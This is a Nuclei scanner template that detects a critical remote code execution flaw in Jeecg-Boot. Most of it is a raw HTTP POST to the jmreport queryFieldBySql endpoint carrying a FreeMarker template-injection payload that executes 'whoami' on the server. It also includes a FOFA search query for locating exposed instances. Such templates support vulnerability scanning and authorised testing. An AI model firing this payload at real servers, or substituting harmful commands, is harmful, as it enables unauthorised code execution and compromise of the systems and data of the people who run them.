id: jeecg-boot-rce
info:
name: Jeecg-Boot rce
author: xiaokv
severity: critical
reference:
- http://www.jeecg.com/
metadata:
max-request: 2
fofa-query: title="Jeecg-Boot" or "polyfill_7_2_5.js"
tags: jeecg-boot
http:
- raw:
- |
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.4.603
Content-Type: application/json
{
"sql":
"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami\") }'"
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"fieldName":"result:'